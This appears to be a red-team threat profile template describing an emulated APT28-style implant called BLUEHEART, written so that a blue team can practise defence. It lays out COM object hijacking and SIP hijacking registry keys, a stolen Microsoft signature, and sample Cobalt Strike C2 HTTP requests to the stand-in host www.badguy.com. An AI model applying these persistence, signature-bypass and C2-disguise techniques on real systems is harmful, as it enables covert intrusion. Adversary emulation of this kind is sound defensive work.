Threat Profile (BLUEHEART)
This example can be used as a reference and would generate as part of threat decomposition and threat profile design.
Description
BLUEHEART was inspired on APT28 malware using CobaltStrike malleable C2 profiles, custom metadata, and TTPs.
Goal and Intent
Emulate TTPs of a realistic adversary to exist on a target network and provide a blue team the opportunity to exercise defensive TTPs.
Key IOCs
- User level C2 Agent
- Custom CobaltStrike Malleable C2 profile to mimic CHOPSTICK IOCs
- Persistence: COM Object Hijacking
- File:
C:\Users\Public\Libraries\apphelp.dll
- HTTP Traffic to www.badguy.com
- Beacons every 60 seconds - 30% jitter User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Modified Date/Time Stamp (Using MetaTwin)
- Custom Binary metadata using valid Microsoft signature
- Modified SubjectInterfacePackage (SIP) for Signature Verification Bypass
Disk Indicators
C:\Users\Public\Libraries\apphelp.dll
Metadata
File: C:\windows\system32\apphelp.dll
InternalName: Apphelp
OriginalFilename: Apphelp
FileVersion: 10.0.10586.0(rs1_release.151029-
1700)
FileDescription:ApplicationCompatibility Client Library
Product: Microsoft® Windows® Operating System
ProductVersion: 10.0.10586.0
Debug: False
Patched: False
PreRelease: False
PrivateBuild: False
SpecialBuild: False
Language: English (United States)
Digital Signature: Stolen from c: \windows\system32\taskhostw.exe
Time Stamp: 10/30/2015 02:17 AM
File Size: 427960
MD5 Hash: A31B0124152CBB60C68DCFEBC9C4909C
Registry Modifications
COM Object Hijack
Key: HKCU:\Software\Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\InProcServer32'
Property: (Default)
Property: ThreadingModel
SIP Hijack
Key: HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
Network Indicators
HTTP Traffic C2 commands through www.badguy.com
Sample HTTP GET Request
GET /index.html HTTP/1.1
Accept-Language: en-US,en;q=0.5
Host: www.badguy.com
Proxy-Connection: Keep-Alive
Cookie: session=sE5QGSAMTumuA/3mNmqe5g==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
Trident/7.0; rv:11.0) like Gecko
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Server: IIS 5.0
Connection: close
Content-Length: 218
<html><head><meta http-equiv="refresh" content=0
url="http://www.badguy.com"><title>Bad Guy Website</title></html>fylWlO
/d4uBN6b0hPlhUDYRcjdjaifkaukstXQZwO3PZpCzTTR
FTERSAITNWz2xTNndMcZgPg==
Sample HTTP POST Request
POST /contact HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.badguy.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=NzQ4NTU=
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;Trident/7.0; rv:11.0) like Gecko
action=Submit&data=jdagislaga-p0Zw
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/octet-stream
Server: IIS 5.0
Connection: close
Content-Length: 40
yF8u8YkdbbWNGWm5gUgaalgOOSfZDX2lnQl5qZEF
C2 Overview
HTTP Traffic on TCP port 80 connecting to www.badguy.com every 60 seconds.
TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)
POST-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation limited and determined POST-exploitation.
Exploitation
Nothing specific. Operator deploys during after initial access.
Persistence
User Level persistence where COM Object Handler loads DLL at user logon under taskhostw.exe
$Description = "SystemSoundsService"
$CLSID = '{2DEA658F-54C1-4227-AF9B-260AB5FC3543}'